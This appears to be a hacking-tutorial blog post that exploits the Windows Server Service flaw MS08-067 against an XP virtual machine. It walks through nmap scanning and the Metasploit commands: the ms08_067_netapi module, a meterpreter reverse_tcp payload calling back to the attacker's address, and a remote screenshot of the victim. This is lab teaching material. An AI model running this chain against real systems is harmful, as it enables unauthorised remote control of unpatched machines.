Hacking Windows XP Using Backtrack
In this article i am going to demonstrate how to hack a remote computer by exploiting the parsing flaw in the pathcanonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.
Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.
The Server service is vulnerable to a remote code-executionvulnerability. The vulnerability is caused due to an error innetapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.
A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.
Exploiting the MS08-067 using Metasploit:
Requirements:
VirtualBox
Backtrack 5
Target OS(XP)
Step 1:
Create Two Virtual Machine(VM) namely "Target" and "BT5". Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.
Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.
Step 3: Information Gathering
Now let us collect some information about the Target machine. For this purpose , we are going to use the nmap tool.
Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12". Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.
Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".
The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.
Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi". Now you can see the list of modules match with the netapi.
We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".
Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.
Step 6: Options
Type "set LHOST 192.168.56.10". Here 192.168.56.10 is IP address of Backtrack machine. You can find the ip address by typing 'ifconfig' command in the Terminal.
Type "set RHOST 192.168.56.12". Here 192.168.56.12 is IP address of Target machine.
Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.
Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.
I hope you understand and enjoy this...........................
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